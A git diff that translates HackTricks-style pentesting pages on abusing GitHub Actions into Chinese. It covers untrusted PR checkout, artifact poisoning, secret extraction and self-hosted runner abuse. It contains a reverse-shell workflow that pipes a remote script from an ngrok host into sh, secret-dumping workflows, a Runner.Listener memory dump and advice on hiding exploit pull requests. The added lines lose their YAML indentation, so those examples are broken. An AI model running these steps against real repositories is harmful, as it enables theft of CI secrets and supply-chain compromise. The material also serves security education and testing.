secrets and write tokens, even if the previous workflow was not**. - -This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\ -The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**. +这种工作流可能会受到攻击,如果它 **依赖** 于一个可以通过 **`pull_request`** 或 **`pull_request_target`** 被外部用户 **触发** 的 **工作流**。一些脆弱的示例可以在 [**这篇博客中找到**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** 第一个示例是 **`workflow_run`** 触发的工作流下载攻击者的代码:`${{ github.event.pull_request.head.sha }}`\ +第二个示例是 **将** 一个 **工件** 从 **不受信任** 的代码传递到 **`workflow_run`** 工作流,并以使其 **易受 RCE 攻击** 的方式使用该工件的内容。 ### `workflow_call` TODO -TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR +TODO:检查从 pull_request 执行时使用/下载的代码是否来自原始或分叉的 PR -## Abusing Forked Execution +## 滥用分叉执行 -We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused: +我们已经提到外部攻击者可以使 GitHub 工作流执行的所有方式,现在让我们看看这些执行如果配置不当,可能会被滥用的情况: -### Untrusted checkout execution +### 不受信任的检出执行 -In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request). +在 **`pull_request`** 的情况下,工作流将在 **PR 的上下文中** 执行(因此它将执行 **恶意 PR 的代码**),但需要有人 **先授权**,并且它将运行时有一些 [限制](./#pull_request)。 -In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**. +如果工作流使用 **`pull_request_target` 或 `workflow_run`**,并依赖于可以从 **`pull_request_target` 或 `pull_request`** 触发的工作流,则将执行原始仓库中的代码,因此 **攻击者无法控制执行的代码**。 > [!CAUTION] -> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded): +> 但是,如果 **action** 有一个 **显式的 PR 检出**,将 **从 PR 获取代码**(而不是从基础),它将使用攻击者控制的代码。例如(检查第 12 行,其中下载了 PR 代码): -
# INSECURE. Provided as an example only.
+
# 不安全。仅作为示例提供。
 on:
-  pull_request_target
+pull_request_target
 
 jobs:
-  build:
-    name: Build and test
-    runs-on: ubuntu-latest
-    steps:
+build:
+name: Build and test
+runs-on: ubuntu-latest
+steps:
     - uses: actions/checkout@v2
       with:
         ref: ${{ github.event.pull_request.head.sha }}
 
-    - uses: actions/setup-node@v1
-    - run: |
-        npm install
-        npm build
+- uses: actions/setup-node@v1
+- run: |
+npm install
+npm build
 
-    - uses: completely/fakeaction@v2
-      with:
-        arg1: ${{ secrets.supersecret }}
+- uses: completely/fakeaction@v2
+with:
+arg1: ${{ secrets.supersecret }}
 
-    - uses: fakerepo/comment-on-pr@v1
-      with:
-        message: |
-          Thank you!
+- uses: fakerepo/comment-on-pr@v1
+with:
+message: |
+谢谢!
 
-The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**. +潜在的 **不受信任的代码在 `npm install` 或 `npm build` 期间被运行**,因为构建脚本和引用的 **包由 PR 的作者控制**。 > [!WARNING] -> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR). +> 搜索脆弱 actions 的 GitHub dork 是:`event.pull_request pull_request_target extension:yml`,但是,即使 action 配置不安全,也有不同的方法可以安全地配置要执行的作业(例如,使用关于谁是生成 PR 的参与者的条件)。 -### Context Script Injections +### 上下文脚本注入 -Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:** +请注意,有某些 [**GitHub 上下文**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) 的值是由创建 PR 的 **用户** **控制** 的。如果 GitHub action 使用该 **数据执行任何操作**,可能会导致 **任意代码执行:** {{#ref}} gh-actions-context-script-injections.md {{#endref}} -### **GITHUB_ENV Script Injection** +### **GITHUB_ENV 脚本注入** -From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file. +根据文档:您可以通过定义或更新环境变量并将其写入 **`GITHUB_ENV`** 环境文件,使 **环境变量可用于工作流作业中的任何后续步骤**。 -If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**. +如果攻击者能够 **在此 env 变量中注入任何值**,他可以注入可以在后续步骤中执行代码的 env 变量,例如 **LD_PRELOAD** 或 **NODE_OPTIONS**。 -For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it: +例如([**这个**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) 和 [**这个**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)),想象一个工作流,它信任上传的工件将其内容存储在 **`GITHUB_ENV`** env 变量中。攻击者可以上传类似这样的内容来破坏它:
-### Vulnerable Third Party Github Actions +### 脆弱的第三方 GitHub Actions #### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact) -As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories. +正如在 [**这篇博客文章**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks) 中提到的,这个 GitHub Action 允许访问来自不同工作流甚至仓库的工件。 -The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact. - -Example of vulnerable workflow: +问题在于,如果 **`path`** 参数未设置,工件将提取到当前目录,并且可能会覆盖后续在工作流中使用或执行的文件。因此,如果工件是脆弱的,攻击者可以利用这一点来破坏其他信任该工件的工作流。 +脆弱工作流的示例: ```yaml on: - workflow_run: - workflows: ["some workflow"] - types: - - completed +workflow_run: +workflows: ["some workflow"] +types: +- completed jobs: - success: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v2 - - name: download artifact - uses: dawidd6/action-download-artifact - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - name: artifact - - run: python ./script.py - with: - name: artifact - path: ./script.py +success: +runs-on: ubuntu-latest +steps: +- uses: actions/checkout@v2 +- name: download artifact +uses: dawidd6/action-download-artifact +with: +workflow: ${{ github.event.workflow_run.workflow_id }} +name: artifact +- run: python ./script.py +with: +name: artifact +path: ./script.py ``` - -This could be attacked with this workflow: - +这可以通过以下工作流进行攻击: ```yaml name: "some workflow" on: pull_request jobs: - upload: - runs-on: ubuntu-latest - steps: - - run: echo "print('exploited')" > ./script.py - - uses actions/upload-artifact@v2 - with: - name: artifact - path: ./script.py +upload: +runs-on: ubuntu-latest +steps: +- run: echo "print('exploited')" > ./script.py +- uses actions/upload-artifact@v2 +with: +name: artifact +path: ./script.py ``` - --- -## Other External Access +## 其他外部访问 -### Deleted Namespace Repo Hijacking +### 删除的命名空间仓库劫持 -If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted. +如果一个账户更改了名称,其他用户在一段时间后可以注册一个相同名称的账户。如果一个仓库在更改名称之前的**星标少于100个**,Github将允许新注册的用户使用相同的名称创建一个**与被删除的仓库同名的仓库**。 > [!CAUTION] -> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action. +> 因此,如果一个操作使用来自不存在账户的仓库,攻击者仍然有可能创建该账户并妥协该操作。 -If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/) +如果其他仓库使用了**该用户仓库的依赖项**,攻击者将能够劫持它们。这里有一个更完整的解释:[https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/) --- -## Repo Pivoting +## 仓库转移 > [!NOTE] -> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section). +> 在本节中,我们将讨论允许**从一个仓库转移到另一个仓库**的技术,假设我们在第一个仓库上有某种访问权限(请查看前一节)。 -### Cache Poisoning +### 缓存中毒 -A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow. +在**同一分支的工作流运行之间**维护一个缓存。这意味着如果攻击者**妥协**了一个**包**,然后将其存储在缓存中,并被**更高权限的**工作流**下载**和执行,他将能够**妥协**该工作流。 {{#ref}} gh-actions-cache-poisoning.md {{#endref}} -### Artifact Poisoning +### 工件中毒 -Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**: +工作流可以使用**来自其他工作流甚至仓库的工件**,如果攻击者设法**妥协**了上传工件的Github Action,而该工件随后被另一个工作流使用,他可以**妥协其他工作流**: {{#ref}} gh-actions-artifact-poisoning.md @@ -394,11 +376,11 @@ gh-actions-artifact-poisoning.md --- -## Post Exploitation from an Action +## 从操作后的利用 -### Accessing AWS and GCP via OIDC +### 通过OIDC访问AWS和GCP -Check the following pages: +查看以下页面: {{#ref}} ../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md @@ -408,170 +390,160 @@ Check the following pages: ../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md {{#endref}} -### Accessing secrets +### 访问秘密 -If you are injecting content into a script it's interesting to know how you can access secrets: +如果您正在向脚本中注入内容,了解如何访问秘密是很有趣的: -- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**. +- 如果秘密或令牌被设置为**环境变量**,可以通过环境直接使用**`printenv`**访问。
-List secrets in Github Action output - +在Github Action输出中列出秘密 ```yaml name: list_env on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - '**' - push: # Run it when a push is made to a branch - branches: - - '**' +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- '**' +push: # Run it when a push is made to a branch +branches: +- '**' jobs: - List_env: - runs-on: ubuntu-latest - steps: - - name: List Env - # Need to base64 encode or github will change the secret value for "***" - run: sh -c 'env | grep "secret_" | base64 -w0' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +List_env: +runs-on: ubuntu-latest +steps: +- name: List Env +# Need to base64 encode or github will change the secret value for "***" +run: sh -c 'env | grep "secret_" | base64 -w0' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-Get reverse shell with secrets - +通过秘密获取反向 shell ```yaml name: revshell on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - create_pull_request: - runs-on: ubuntu-latest - steps: - - name: Get Rev Shell - run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +create_pull_request: +runs-on: ubuntu-latest +steps: +- name: Get Rev Shell +run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible. - - ```bash - cat /home/runner/work/_temp/* - ``` -- For a JavaScript actions the secrets and sent through environment variables - - ```bash - ps axe | grep node - ``` -- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**: +- 如果秘密**直接在表达式中使用**,生成的 shell 脚本将存储在**磁盘上**并可访问。 +- ```bash +cat /home/runner/work/_temp/* +``` +- 对于 JavaScript actions,秘密通过环境变量发送 +- ```bash +ps axe | grep node +``` +- 对于**自定义操作**,风险可能会有所不同,具体取决于程序如何使用从**参数**中获得的秘密: - ```yaml - uses: fakeaction/publish@v3 - with: - key: ${{ secrets.PUBLISH_KEY }} - ``` +```yaml +uses: fakeaction/publish@v3 +with: +key: ${{ secrets.PUBLISH_KEY }} +``` -### Abusing Self-hosted runners +### 滥用自托管运行器 -The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml. +查找**在非 GitHub 基础设施中执行的 GitHub Actions**的方法是搜索 GitHub Action 配置 yaml 中的**`runs-on: self-hosted`**。 -**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one. - -In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory: +**自托管**运行器可能访问**额外的敏感信息**,访问其他**网络系统**(网络中的脆弱端点?元数据服务?)或者,即使它是隔离和销毁的,**可能会同时运行多个操作**,恶意操作可能会**窃取其他操作的秘密**。 +在自托管运行器中,还可以通过转储其内存来获取**来自 \_Runner.Listener**\_\*\* 进程\*\* 的**秘密**,该进程将在任何步骤中包含工作流的所有秘密: ```bash sudo apt-get install -y gdb sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')" ``` +检查[**此帖子以获取更多信息**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/)。 -Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/). +### Github Docker 镜像注册表 -### Github Docker Images Registry - -It's possible to make Github actions that will **build and store a Docker image inside Github**.\ -An example can be find in the following expandable: +可以创建 Github actions 来 **在 Github 内部构建和存储 Docker 镜像**。\ +以下可找到一个示例:
-Github Action Build & Push Docker Image - +Github Action 构建 & 推送 Docker 镜像 ```yaml [...] - name: Set up Docker Buildx - uses: docker/setup-buildx-action@v1 +uses: docker/setup-buildx-action@v1 - name: Login to GitHub Container Registry - uses: docker/login-action@v1 - with: - registry: ghcr.io - username: ${{ github.repository_owner }} - password: ${{ secrets.ACTIONS_TOKEN }} +uses: docker/login-action@v1 +with: +registry: ghcr.io +username: ${{ github.repository_owner }} +password: ${{ secrets.ACTIONS_TOKEN }} - name: Add Github Token to Dockerfile to be able to download code - run: | - sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile +run: | +sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile - name: Build and push - uses: docker/build-push-action@v2 - with: - context: . - push: true - tags: | - ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest - ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }} +uses: docker/build-push-action@v2 +with: +context: . +push: true +tags: | +ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest +ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }} [...] ``` -
-As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**. - -A user with read permissions over the repo will then be able to download the Docker Image using a personal access token: +正如您在之前的代码中看到的,Github 注册表托管在 **`ghcr.io`**。 +具有对该仓库的读取权限的用户将能够使用个人访问令牌下载 Docker 镜像: ```bash echo $gh_token | docker login ghcr.io -u --password-stdin docker pull ghcr.io//: ``` - -Then, the user could search for **leaked secrets in the Docker image layers:** +然后,用户可以搜索 **Docker 镜像层中的泄露秘密:** {{#ref}} https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics {{#endref}} -### Sensitive info in Github Actions logs +### Github Actions 日志中的敏感信息 -Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret). +即使 **Github** 尝试 **检测日志中的秘密值** 并 **避免显示** 它们,**其他敏感数据** 在执行操作时生成的内容仍然不会被隐藏。例如,使用秘密值签名的 JWT 除非 [特别配置](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret),否则不会被隐藏。 -## Covering your Tracks +## 掩盖你的痕迹 -(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **can’t delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR) +(技术来自 [**这里**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit))首先,任何提出的 PR 在 Github 上对公众和目标 GitHub 账户都是明显可见的。在 GitHub 中,默认情况下,我们 **无法删除互联网上的 PR**,但有一个变数。对于被 Github **暂停** 的 GitHub 账户,所有的 **PR 会被自动删除** 并从互联网上移除。因此,为了隐藏你的活动,你需要让你的 **GitHub 账户被暂停或被标记**。这将 **隐藏你在 GitHub 上的所有活动**(基本上移除你所有的利用 PR) -An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github. +GitHub 中的一个组织非常积极地向 GitHub 举报账户。你所需要做的就是在 Issue 中分享“某些东西”,他们会确保你的账户在 12 小时内被暂停 :p 这样,你的利用在 GitHub 上就变得不可见了。 > [!WARNING] -> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed. +> 组织发现自己被针对的唯一方法是通过 SIEM 检查 GitHub 日志,因为从 GitHub UI 中 PR 会被移除。 -## Tools +## 工具 -The following tools are useful to find Github Action workflows and even find vulnerable ones: +以下工具对于查找 GitHub Action 工作流甚至查找易受攻击的工作流非常有用: - [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven) - [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato) @@ -579,7 +551,3 @@ The following tools are useful to find Github Action workflows and even find vul - [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md index ae156de2d..59da712ac 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md @@ -1,6 +1 @@ # Gh Actions - Artifact Poisoning - - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md index 024aa5ff8..489446262 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md @@ -1,6 +1 @@ -# GH Actions - Cache Poisoning - - - - - +# GH Actions - 缓存中毒 diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md index 3cd632bd0..7504dd8ff 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md @@ -1,6 +1 @@ -# Gh Actions - Context Script Injections - - - - - +# Gh Actions - 上下文脚本注入 diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md index f19fa699e..699952c62 100644 --- a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md +++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md @@ -2,59 +2,55 @@ {{#include ../../banners/hacktricks-training.md}} -This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github). +这种访问被认为已删除的Github数据的方法在[**这篇博客文章中报告**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)。 ## Accessing Deleted Fork Data -1. You fork a public repository -2. You commit code to your fork -3. You delete your fork +1. 你fork一个公共仓库 +2. 你向你的fork提交代码 +3. 你删除你的fork > [!CAUTION] -> The data commited in the deleted fork is still accessible. +> 在已删除的fork中提交的数据仍然可以访问。 ## Accessing Deleted Repo Data -1. You have a public repo on GitHub. -2. A user forks your repo. -3. You commit data after they fork it (and they never sync their fork with your updates). -4. You delete the entire repo. +1. 你在GitHub上有一个公共仓库。 +2. 一个用户fork了你的仓库。 +3. 你在他们fork之后提交数据(而他们从未将他们的fork与您的更新同步)。 +4. 你删除整个仓库。 > [!CAUTION] -> Even if you deleted your repo, all the changes made to it are still accessible through the forks. +> 即使你删除了你的仓库,对其所做的所有更改仍然可以通过fork访问。 ## Accessing Private Repo Data -1. You create a private repo that will eventually be made public. -2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public. -3. You make your “upstream” repository public and keep your fork private. +1. 你创建一个最终会公开的私有仓库。 +2. 你创建该仓库的私有内部版本(通过fork)并提交额外的代码用于你不打算公开的功能。 +3. 你将你的“上游”仓库设为公开,并保持你的fork为私有。 > [!CAUTION] -> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public. +> 在内部fork创建和公共版本公开之间的时间内,可以访问推送到内部fork的所有数据。 ## How to discover commits from deleted/hidden forks -The same blog post propose 2 options: +同一篇博客文章提出了两个选项: ### Directly accessing the commit -If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/` +如果已知提交ID(sha-1)值,可以在`https://github.com///commit/`中访问它。 ### Brute-forcing short SHA-1 values -It's the same to access both of these: +访问这两者是相同的: - [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14) - [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463) -And the latest one use a short sha-1 that is bruteforceable. +而最新的一个使用了一个可以暴力破解的短sha-1。 ## References - [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md index ae1365a0f..bfeafcf88 100644 --- a/src/pentesting-ci-cd/github-security/basic-github-information.md +++ b/src/pentesting-ci-cd/github-security/basic-github-information.md @@ -1,248 +1,241 @@ -# Basic Github Information +# 基本的 Github 信息 {{#include ../../banners/hacktricks-training.md}} -## Basic Structure +## 基本结构 -The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**. +大型 **公司** 的基本 github 环境结构是拥有一个 **企业**,该企业拥有 **多个组织**,每个组织可能包含 **多个代码库** 和 **多个团队**。较小的公司可能只 **拥有一个组织而没有企业**。 -From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**. +从用户的角度来看,**用户** 可以是 **不同企业和组织的成员**。在这些组织中,用户可能拥有 **不同的企业、组织和代码库角色**。 -Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles. +此外,用户可能是 **不同团队的一部分**,并拥有不同的企业、组织或代码库角色。 -And finally **repositories may have special protection mechanisms**. +最后,**代码库可能具有特殊的保护机制**。 -## Privileges +## 权限 -### Enterprise Roles +### 企业角色 -- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository -- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**. +- **企业所有者**:拥有此角色的人可以 **管理管理员、管理企业内的组织、管理企业设置、在组织间强制执行政策**。但是,他们 **无法访问组织设置或内容**,除非他们被指定为组织所有者或获得对组织拥有的代码库的直接访问权限。 +- **企业成员**:由您的企业拥有的组织的成员也 **自动成为企业成员**。 -### Organization Roles +### 组织角色 -In an organisation users can have different roles: +在组织中,用户可以拥有不同的角色: -- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization. -- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**. -- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information. -- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization. - - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. -- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions. -- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization. +- **组织所有者**:组织所有者对您的组织拥有 **完全的管理访问权限**。此角色应限制,但不应少于两人。 +- **组织成员**:在 **组织中的人** 的默认非管理角色是组织成员。默认情况下,组织成员 **拥有一定数量的权限**。 +- **账单管理员**:账单管理员是可以 **管理您组织的账单设置** 的用户,例如支付信息。 +- **安全管理员**:这是组织所有者可以分配给组织中任何团队的角色。应用后,它赋予团队的每个成员权限,以 **管理组织内的安全警报和设置,以及对所有代码库的读取权限**。 +- 如果您的组织有安全团队,您可以使用安全管理员角色为团队成员提供他们所需的最低访问权限。 +- **Github 应用管理员**:为了允许其他用户 **管理组织拥有的 GitHub 应用**,所有者可以授予他们 GitHub 应用管理员权限。 +- **外部协作者**:外部协作者是指 **可以访问一个或多个组织代码库但不是组织的明确成员** 的人。 -You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) +您可以在此表中 **比较这些角色的权限**:[https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles) -### Members Privileges +### 成员权限 -In _https://github.com/organizations/\/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**. +在 _https://github.com/organizations/\/settings/member_privileges_ 中,您可以查看 **用户仅因成为组织的一部分而拥有的权限**。 -The settings here configured will indicate the following permissions of members of the organisation: +此处配置的设置将指示组织成员的以下权限: -- Be admin, writer, reader or no permission over all the organisation repos. -- If members can create private, internal or public repositories. -- If forking of repositories is possible -- If it's possible to invite outside collaborators -- If public or private sites can be published -- The permissions admins has over the repositories -- If members can create new teams +- 对所有组织代码库拥有管理员、写入、读取或无权限。 +- 成员是否可以创建私有、内部或公共代码库。 +- 是否可以对代码库进行分叉。 +- 是否可以邀请外部协作者。 +- 是否可以发布公共或私有网站。 +- 管理员对代码库的权限。 +- 成员是否可以创建新团队。 -### Repository Roles +### 代码库角色 -By default repository roles are created: +默认情况下,创建的代码库角色有: -- **Read**: Recommended for **non-code contributors** who want to view or discuss your project -- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access -- **Write**: Recommended for contributors who **actively push to your project** -- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions -- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository +- **读取**:推荐给 **非代码贡献者**,希望查看或讨论您的项目。 +- **分类**:推荐给 